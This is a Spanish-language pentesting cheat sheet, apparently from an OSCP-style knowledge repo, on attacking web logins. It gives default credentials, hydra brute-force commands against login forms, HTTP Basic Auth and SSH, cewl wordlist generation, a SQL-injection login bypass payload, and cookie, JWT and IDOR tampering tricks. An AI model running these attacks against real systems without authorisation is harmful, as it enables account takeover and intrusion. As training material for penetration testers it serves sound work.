JARVIS/nucleo/saber/conocimiento/02 - Explotacion web/Authentication attacks.md
sito 7e06ce46cf saber: pack de metodologia publico (conocimiento/) + doc del RAG
El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP,
scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya
sabe de enumeracion, explotacion web, shells, privesc, Active Directory,
cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
2026-08-16 17:58:41 +02:00

1.4 KiB

Authentication attacks

Romper logins web: credenciales por defecto, fuerza bruta y bypass. Casi siempre el primer intento en Hacking web.

1. Lo gratis primero

  • Credenciales por defecto: admin:admin, admin:password, root:root, las del CMS/producto (búscalas: searchsploit <producto> o Google).
  • Reutilización: cualquier credencial que pillaste antes (Metodología OSCP).

2. Fuerza bruta con hydra

# Formulario POST: necesitas el campo y el mensaje de fallo
hydra -l admin -P /usr/share/wordlists/rockyou.txt IP http-post-form \
  "/login.php:user=^USER^&pass=^PASS^:Invalid credentials"
# HTTP Basic Auth:
hydra -L users.txt -P pass.txt IP http-get /admin
# SSH (si hay user válido):
hydra -l bob -P rockyou.txt ssh://IP
  • El :F=mensaje o :S=éxito es lo que distingue fallo de acierto → cógelo en Burp Repeater e Intruder.

3. Wordlists a medida

cewl http://IP -w custom.txt          # palabras de la propia web
# combinar con reglas de hashcat / variaciones

4. Bypass (no fuerza bruta)

  • SQLi en el login' OR '1'='1'-- - → SQL injection.
  • Cookies/roles manipulables: isAdmin=falsetrue, role=useradmin (en Burp Suite).
  • JWT: alg none, secreto débil (jwt_tool, crackeo con rockyou).
  • IDOR: cambia ?id=1 por ?id=2 y accedes a datos de otro.
  • Cookie/sesión robada vía XSS.

Relacionado: Burp Repeater e Intruder · SQL injection · OSCP MOC